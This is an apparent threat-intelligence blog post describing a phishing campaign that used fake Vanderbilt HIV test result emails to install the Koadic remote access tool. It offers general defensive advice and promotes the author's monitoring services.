Cybersecurity researchers have uncovered a new phishing campaign that uses fake HIV test results to lure victims into clicking a malicious link. This underhanded campaign has been detected targeting insurance, healthcare, and pharmaceutical companies. In the latest version of the scam, cyber threat analysts observed cybercriminals impersonating Vanderbilt University Medical Center and sending out fake HIV test result emails. Recipients were encouraged to open malicious content embedded into the message, which triggered the installation of Koadic RAT. Once installed, the malware can take complete control of a user's system, running programs on the infected device and accessing victims’ data, including sensitive, personal, and financial information.[1]
Koadic, or COM Command & Control, is a Windows post-exploitation rootkit like other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10. It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled). Recent versions Koadic were developed on Python 3.
The control it gives attackers has made Koadic popular among many threat actors in recent years, particularly those thought to be state sponsored by the People's Republic of China, the Russian Federation, and Iran. Though criminally accomplished, the attackers in this instance made a stupid error in putting together the text of their egregious email, misspelling Vanderbilt as "Vanderbit." This latest campaign serves as a reminder that health-related lures did not start and will not stop with the recent Coronavirus-themed emails, which will only increase due government and media attention. These emails are just another tactic used by attackers to gain access to systems and networks. Cyber threat analysts have advised all users to (always) think before they click and to consider that healthcare professionals are very unlikely to send sensitive information such as the results of an HIV test over email.
Insurance companies and healthcare providers’ sensitive health-related information is typically safely transmitted using secured messaging portals, over the phone only after verifying the identity of the person on the telephone or in person, according to HIPPA privacy regulations.
If you receive an email that claims to have sensitive health-related information, do not open the attachments. Instead, visit your medical provider’s patient portal directly, call your doctor’s office to verify, or make an appointment to directly, face to face, confirm any medical diagnosis or test results.
Red Sky Alliance has been has analyzing and documenting cyber threats for 8 years and maintains a resource library of malware and cyber actor reports.
The installation, updating and monitoring of firewalls, cyber security and proper employee training are keys to blocking attacks. Please feel free to contact our analyst team for research assistance and Cyber Threat Analysis on your organization.
What can you do to better protect your organization today?
- All data in transmission and at rest should be encrypted.
- Proper data back-up and off-site storage policies should be adopted and followed.
- Update disaster recovery plans and emergency procedures with cyber threat recovery procedures.
- Institute cyber threat and phishing training for all employees, with testing and updating.
- Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.
- Ensure that all software updates and patches are installed immediately.
- Enroll your company/organization in RedXray for daily cyber threat notifications are directed at your domains. RedXray service is $500 a month and provides threat intelligence on nine (9) cyber threat categories including Keyloggers, with having to connect to your network.
- Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance
Conclusion
Red Sky Alliance strongly recommends ongoing monitoring from both internal and external perspectives. Internal monitoring is common practice. However, external threats are often overlooked and can represent an early warning of impending attacks. Red Sky Alliance can provide both internal monitoring in tandem with RedXray notifications on external threats to include, botnet activity, public data breaches, phishing, fraud, and general targeting. Red Sky Alliance is located in New Boston, NH USA. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com
Interested in a RedXray subscription to see what we can do for you? Sign up here: https://www.wapacklabs.com/redxray
Reporting: https://www.redskyalliance.org/
Website: https://www.wapacklabs.com/
LinkedIn: https://www.linkedin.com/company/wapacklabs/
Twitter: https://twitter.com/wapacklabs?lang=en
[1] https://www.beckershospitalreview.com/cybersecurity/hackers-impersonate-vanderbilt-university-medical-center-to-lure-victims-in-phishing-attacks.html
